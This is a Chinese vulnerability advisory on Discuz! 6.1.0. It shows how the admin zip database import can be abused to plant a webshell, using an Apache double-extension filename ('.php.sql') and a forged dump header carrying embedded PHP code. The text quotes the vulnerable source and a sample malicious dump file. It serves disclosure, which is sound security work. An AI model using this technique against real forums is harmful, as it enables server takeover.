由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.<br />
在文件admin\database.inc.php里代码:<br />
.....<br />
elseif($operation == 'importzip') {<br />
<br />
require_once DISCUZ_ROOT.'admin/zip.func.php';<br />
$unzip = new SimpleUnzip();<br />
$unzip->ReadFile($datafile_server);<br />
if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {<br />
cpmsg('database_import_file_illegal', '', 'error');<br />
}<br />
<br />
$identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));<br />
$confirm = !empty($confirm) ? 1 : 0;<br />
if(!$confirm && $identify[1] != $version) {<br />
cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form');<br />
}<br />
<br />
$sqlfilecount = 0;<br />
foreach($unzip->Entries as $entry) {<br />
if(preg_match("/\.sql$/i", $entry->Name)) {<br />
$fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');<br />
fwrite($fp, $entry->Data);<br />
fclose($fp);<br />
$sqlfilecount++;<br />
}<br />
}<br />
......<br />
<br />
注意2点<br />
1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0)) 可以利用apache的特性如081127_k4pFUs3C-1.php.sql这样类似的文件.<br />
2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256)))); 所以要注意文件格式:[可以先备用下然后修改打包为zip]<br />
<br />
# Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ==<br />
# <?phpinfo();?><br />
# <?exit();?><br />
# Discuz! Multi-Volume Data Dump Vol.1<br />
# Version: Discuz! 6.1.0<br />
# Time: 2008-11-27 11:38<br />
# Type: discuz<br />
# Table Prefix: cdb_
Discuz! 6.1.0
暂无
京公网安备 11010502034610号
暂无评论